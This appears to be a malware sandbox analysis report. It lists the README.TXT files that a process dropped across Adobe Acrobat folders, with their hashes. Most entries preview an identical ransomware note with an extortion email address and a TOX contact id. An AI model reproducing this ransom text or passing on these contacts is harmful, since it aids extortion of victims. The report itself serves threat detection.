                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\en-us\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
